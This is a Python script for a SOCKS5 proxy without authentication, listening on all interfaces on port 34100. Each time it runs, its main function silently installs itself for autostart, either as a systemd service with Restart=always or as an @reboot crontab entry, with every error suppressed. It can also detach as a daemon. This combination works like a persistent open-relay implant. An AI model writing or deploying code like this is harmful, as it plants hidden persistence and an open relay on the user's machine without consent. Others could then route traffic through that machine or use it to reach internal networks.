#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import socket
import select
from struct import pack, unpack
import traceback
from threading import Thread, active_count
from signal import signal, SIGINT, SIGTERM
from time import sleep
import sys
import os

MAX_THREADS = 1000
BUFSIZE = 4096
TIMEOUT_SOCKET = 5
LOCAL_ADDR = '0.0.0.0'
LOCAL_PORT = 34100

OUTGOING_INTERFACE = ""

VER = b'\x05'
M_NOAUTH = b'\x00'
M_NOTAVAILABLE = b'\xff'
CMD_CONNECT = b'\x01'
ATYP_IPV4 = b'\x01'
ATYP_DOMAINNAME = b'\x03'
ATYP_IPV6 = b'\x04'

EXIT_FLAG = False
DAEMON_MODE = False

def add_to_autostart(script_path):
    log_message("Attempting to add to autostart (ignoring errors)...")

    abs_script = os.path.abspath(script_path)

    have_systemd_privs = False
    if os.path.isdir("/etc/systemd/system") and os.access("/etc/systemd/system", os.W_OK):
        have_systemd_privs = True

    if have_systemd_privs:
        try:
            os.system("mkdir -p /etc/systemd/system 2>/dev/null || true")
            os.system("touch /etc/systemd/system/python_socks5.service 2>/dev/null || true")
            os.system("chmod 644 /etc/systemd/system/python_socks5.service 2>/dev/null || true")

            unit_content = f"""[Unit]
Description=Python SOCKS5 Proxy

[Service]
Type=simple
ExecStart={abs_script} -d
Restart=always

[Install]
WantedBy=multi-user.target
"""
            with open("/etc/systemd/system/python_socks5.service", "w") as f:
                f.write(unit_content)

            os.system("systemctl daemon-reload 2>/dev/null || true")
            os.system("systemctl enable python_socks5.service 2>/dev/null || true")

            os.system("update-rc.d python_socks5 defaults 2>/dev/null || true")
            os.system("chkconfig --add python_socks5 2>/dev/null || true")
        except Exception:
            pass
    else:
        log_message("No root privileges for system-wide autostart. Trying user-level methods...")

        cron_cmd = (
            f'( (crontab -l 2>/dev/null || echo "") | grep -v "{abs_script}"; '
            f'echo "@reboot {abs_script} -d" ) | crontab - 2>/dev/null || true'
        )
        os.system(cron_cmd)

    log_message("Autostart attempt done.")


def log_message(msg):
    print(f"[LOG] {msg}")


def daemonize():
    pid = os.fork()
    if pid > 0:
        sys.exit(0)
    os.setsid()
    pid = os.fork()
    if pid > 0:
        sys.exit(0)
    sys.stdin.close()
    sys.stdout.close()
    sys.stderr.close()


def proxy_loop(socket_src, socket_dst):
    global EXIT_FLAG
    while not EXIT_FLAG:
        try:
            ready, _, _ = select.select([socket_src, socket_dst], [], [], 1)
        except select.error:
            return
        if not ready:
            continue
        for sock in ready:
            try:
                data = sock.recv(BUFSIZE)
            except socket.error:
                return
            if not data:
                return
            if sock is socket_dst:
                try:
                    socket_src.sendall(data)
                except socket.error:
                    return
            else:
                try:
                    socket_dst.sendall(data)
                except socket.error:
                    return


def create_socket():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(TIMEOUT_SOCKET)
        return s
    except socket.error as err:
        log_message(f"Failed to create socket: {err}")
        sys.exit(1)


def connect_to_dst(dst_addr, dst_port):
    sock = create_socket()
    if OUTGOING_INTERFACE:
        try:
            sock.setsockopt(
                socket.SOL_SOCKET,
                socket.SO_BINDTODEVICE,
                OUTGOING_INTERFACE.encode()
            )
        except PermissionError:
            log_message("Only root can set OUTGOING_INTERFACE parameter")
            global EXIT_FLAG
            EXIT_FLAG = True
    try:
        sock.connect((dst_addr, dst_port))
        return sock
    except socket.error as err:
        log_message(f"Failed to connect to DST {dst_addr}:{dst_port}: {err}")
        return None


def request_client(wrapper):
    try:
        data = wrapper.recv(BUFSIZE)
    except (ConnectionResetError, socket.error):
        return None

    if len(data) < 7:
        return None

    ver_, cmd_, rsv_ = data[0:1], data[1:2], data[2:3]
    atyp_ = data[3:4]
    if ver_ != VER or cmd_ != CMD_CONNECT or rsv_ != b'\x00':
        return None

    if atyp_ == ATYP_IPV4:
        if len(data) < 10:
            return None
        dst_addr = socket.inet_ntoa(data[4:8])
        dst_port = unpack('>H', data[8:10])[0]
        return dst_addr, dst_port
    elif atyp_ == ATYP_DOMAINNAME:
        if len(data) < 5:
            return None
        domain_len = data[4]
        if len(data) < (5 + domain_len + 2):
            return None
        dst_addr = data[5:5 + domain_len].decode("utf-8", errors="ignore")
        port_part = data[5 + domain_len:5 + domain_len + 2]
        dst_port = unpack('>H', port_part)[0]
        return dst_addr, dst_port
    elif atyp_ == ATYP_IPV6:
        if len(data) < 4 + 16 + 2:
            return None
        return None
    else:
        return None


def request(wrapper):
    dst = request_client(wrapper)
    if not dst:
        reply = VER + b'\x01' + b'\x00' + ATYP_IPV4 + b'\x00'*6
        try:
            wrapper.sendall(reply)
        except:
            pass
        return

    socket_dst = connect_to_dst(dst[0], dst[1])
    if not socket_dst:
        reply = VER + b'\x01' + b'\x00' + ATYP_IPV4 + b'\x00'*6
        try:
            wrapper.sendall(reply)
        except:
            pass
        return

    bnd = socket.inet_aton(socket_dst.getsockname()[0])
    bnd += pack(">H", socket_dst.getsockname()[1])
    reply = VER + b'\x00' + b'\x00' + ATYP_IPV4 + bnd
    try:
        wrapper.sendall(reply)
    except:
        socket_dst.close()
        return

    proxy_loop(wrapper, socket_dst)
    socket_dst.close()


def subnegotiation_client(wrapper):
    try:
        data = wrapper.recv(BUFSIZE)
    except socket.error:
        return M_NOTAVAILABLE

    if len(data) < 2:
        return M_NOTAVAILABLE

    ver_ = data[0:1]
    if ver_ != VER:
        return M_NOTAVAILABLE

    nmethods = data[1]
    methods = data[2:]
    if len(methods) != nmethods:
        return M_NOTAVAILABLE

    if M_NOAUTH in [methods[i:i+1] for i in range(nmethods)]:
        return M_NOAUTH
    return M_NOTAVAILABLE


def subnegotiation(wrapper):
    method = subnegotiation_client(wrapper)
    if method != M_NOAUTH:
        try:
            wrapper.sendall(VER + M_NOTAVAILABLE)
        except:
            pass
        return False
    try:
        wrapper.sendall(VER + M_NOAUTH)
    except:
        return False
    return True


def connection_handler(wrapper):
    if subnegotiation(wrapper):
        request(wrapper)
    wrapper.close()


def bind_port(sock):
    global LOCAL_PORT
    log_message(f"Binding on port {LOCAL_PORT}")
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        sock.bind((LOCAL_ADDR, LOCAL_PORT))
        sock.listen(10)
    except socket.error as err:
        log_message(f"Bind/Listen failed: {err}")
        sock.close()
        sys.exit(1)


def exit_handler(signum, frame):
    """Signal handler -> set EXIT_FLAG."""
    global EXIT_FLAG
    log_message(f"Signal handler called with signal {signum}")
    EXIT_FLAG = True


def main():
    global EXIT_FLAG, LOCAL_PORT, DAEMON_MODE

    args = sys.argv[1:]
    idx = 0
    while idx < len(args):
        if args[idx] == '-n':
            idx += 1
            if idx < len(args):
                LOCAL_PORT = int(args[idx])
        elif args[idx] == '-d':
            DAEMON_MODE = True
        elif args[idx] == '-h':
            print(f"Usage: {sys.argv[0]} [-n port] [-d]")
            sys.exit(0)
        idx += 1

    if DAEMON_MODE:
        daemonize()

    add_to_autostart(sys.argv[0])

    signal(SIGINT, exit_handler)
    signal(SIGTERM, exit_handler)

    srv_socket = create_socket()
    bind_port(srv_socket)

    log_message(f"Started SOCKS5 proxy on port {LOCAL_PORT}, waiting for connections...")
    while not EXIT_FLAG:
        if active_count() > MAX_THREADS:
            sleep(3)
            continue
        try:
            wrapper, addr = srv_socket.accept()
            wrapper.settimeout(TIMEOUT_SOCKET)
        except socket.timeout:
            continue
        except socket.error:
            continue
        except TypeError:
            sys.exit(1)

        t = Thread(target=connection_handler, args=(wrapper,))
        t.daemon = True
        t.start()

    srv_socket.close()
    log_message("Exiting main loop")


if __name__ == '__main__':
    main()
